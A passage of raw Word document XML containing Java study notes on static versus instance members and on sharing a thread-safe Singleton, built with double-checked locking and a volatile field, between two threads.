          <w:ilvl w:val="0"/>
          <w:numId w:val="3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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you want a method or variable to be shared across all instances of a class, like utility methods or constants.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA65E44" w14:textId="77777777" w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3DB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-static (instance)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> members when each object should have its own data and behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127B1A37" w14:textId="77777777" w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3DB6" w:rsidP="00CC3D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ch of these keywords plays a crucial role in how objects and classes interact in Java, allowing you to write more efficient, modular, and manageable code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BEB4D4" w14:textId="75E24FB0" w:rsidR="0029340F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0029340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BB2CFFF">
          <v:rect id="_x0000_i1167" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE8763C" w14:textId="57C81B67" w:rsidR="004568BC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E54CE4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc196307523"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How will I use two threads using a singleton design pattern</w:t>
      </w:r>
      <w:r w:rsidR="004568BC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="27801192" w14:textId="47923284" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701" w:rsidP="000E57DB">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order to use two threads with a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Singleton Design Pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, we first need to understand the Singleton pattern and how to apply it with threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772EDD8A" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701" w:rsidP="004D170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ingleton Design Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF5DD42" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701" w:rsidP="004D170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ingleton pattern ensures that a class has only one instance and provides a global point of access to that instance. It is typically used when you want to limit the instantiation of a class to one object and you want to provide a mechanism to access that object globally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02361D00" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701" w:rsidP="004D170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ow to Implement Singleton Design Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71032B51" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701" w:rsidP="004D170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e can implement the Singleton Design Pattern in Java in different ways, but the most common and thread-safe way is to use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Double-Checked Locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> mechanism with volatile keyword. This ensures that the instance is created only when required, and that it is thread-safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A1A39D" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701" w:rsidP="004D170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eps to use Two Threads with Singleton Design Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510E78B4" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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reate a Singleton class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with thread-safety.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333973D9" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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reate two threads</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that access the Singleton instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1E193C" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701" w:rsidP="004D170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Singleton Design Pattern with Two Threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BADEA0" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701" w:rsidP="004D170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ep 1: Singleton Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7515CF5C"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0C0F9ED"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1. Create a private static variable to hold the single instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6640DC87"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lati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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6159024E"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2EBA4D51"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2. Private constructor prevents instantiation from other classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C34F43E"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68AC3DE"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Example: Simulate some time-consuming task like DB initialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2488F138"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y</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49AB574"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leep</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200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imulating time-consuming process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E300141"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atch</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InterruptedException</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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2ACD37D"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StackTrace</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3A10B7"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DA02010"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2FADFA7"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2D62DB57"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3. Public method to provide access to the instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448571FF"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> getInstan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E7311DC"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Double-Checked Locking for thread-safety</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F81170A"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nstanc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65DA69D"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ynchronize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ingleton</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clas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1CD8F8E"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nstanc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6090F1B"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instanc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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34955474"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FD5B138"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3FC8B56"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A7A1B7D"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instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297D5B8F"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92E4BEC"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102387CF"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ample method to show functionality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1DD954"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showMess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A275026"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ello from Singleton!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713A731B"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00ECBA6" w14:textId="7249D77B"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49C44042" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701" w:rsidP="004D170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ep 2: Threads Accessing Singleton</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE42733"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Examp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xtend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EC0A7B7"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1FEF0FAB"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ru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138D416"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Each thread gets the Singleton instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2D15F9"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> singleto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Instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B0E453"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        singlet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howMessage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55340929"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8504EE6"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEFA1B3"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431B2931"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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i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4081C7D"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639992A"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ing two threads that will access the Singleton</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB5AB1D"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> thread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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16723C9F"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> thread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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378C655F"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2019BD8A"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        thread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ar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tart the first thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16890A50"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        thread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ar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tart the second thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225D54DD" w14:textId="77777777"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8870FD6" w14:textId="1F3E3E7C" w:rsidR="001738E2" w:rsidRPr="00CE4B95"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2D4DFAB0" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701" w:rsidP="004D170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 of the Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2397070F" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ingleton Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F68B1C" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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ingleton class has a private static volatile instance variable to hold the single instance of the class. The volatile keyword ensures that the instance is created and visible across all threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5443A802" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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getInstance() method implements </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>double-checked locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. First, it checks if the instance is null before entering the synchronized block to minimize synchronization overhead. Inside the synchronized block, it checks again if the instance is still null before creating the instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429131DD" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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howMessage() method is a sample method to demonstrate functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5732BCA8" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Example Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507C5CE9" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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ThreadExample class extends Thread and overrides the run() method. Inside run(), the thread calls Singleton.getInstance() to get the Singleton instance and then calls the showMessage() method to print the message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E05355A" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ain Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DCAE50" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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e main() method, two threads (thread1 and thread2) are created and started. Each thread will try to access the Singleton instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05180D21" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701" w:rsidP="004D170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ected Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BC6B35" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701" w:rsidP="004D170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llo from Singleton!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056976EC" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701" w:rsidP="004D170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llo from Singleton!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A03E4B9" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701" w:rsidP="004D170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hread-Safety Consideration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426A4E65" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701" w:rsidP="004D170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the above code, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> class is thread-safe due to the following reasons:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034E5395" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35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ouble-Checked Locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This prevents multiple threads from creating multiple instances of the Singleton.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE93B44" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35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olatile Keyword</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This ensures that changes to the instance are visible to all threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04938C21" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701" w:rsidP="004D170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ow It Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B73921A" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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itially, both threads attempt to access the Singleton instance. Since the instance is null, both threads will enter the synchronized block.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB8A732" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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first thread will create the instance of the Singleton, and the second thread will see that the instance is already created (due to the double-checked locking), so it will simply access the existing instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F2E209" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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oth threads then print the message using the Singleton instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D647F1" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701" w:rsidP="004D170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ime Complexity &amp; Space Complexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6492A5C4" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ime Complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: O(1) because the instance is created only once, and subsequent accesses are constant-time operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EE3966" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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pace Complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: O(1) because only one instance of the Singleton is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161CFF29" w14:textId="77777777" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701" w:rsidP="004D170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63E55579" w14:textId="4DF36578" w:rsidR="0029340F" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701" w:rsidP="001222A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y implementing the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
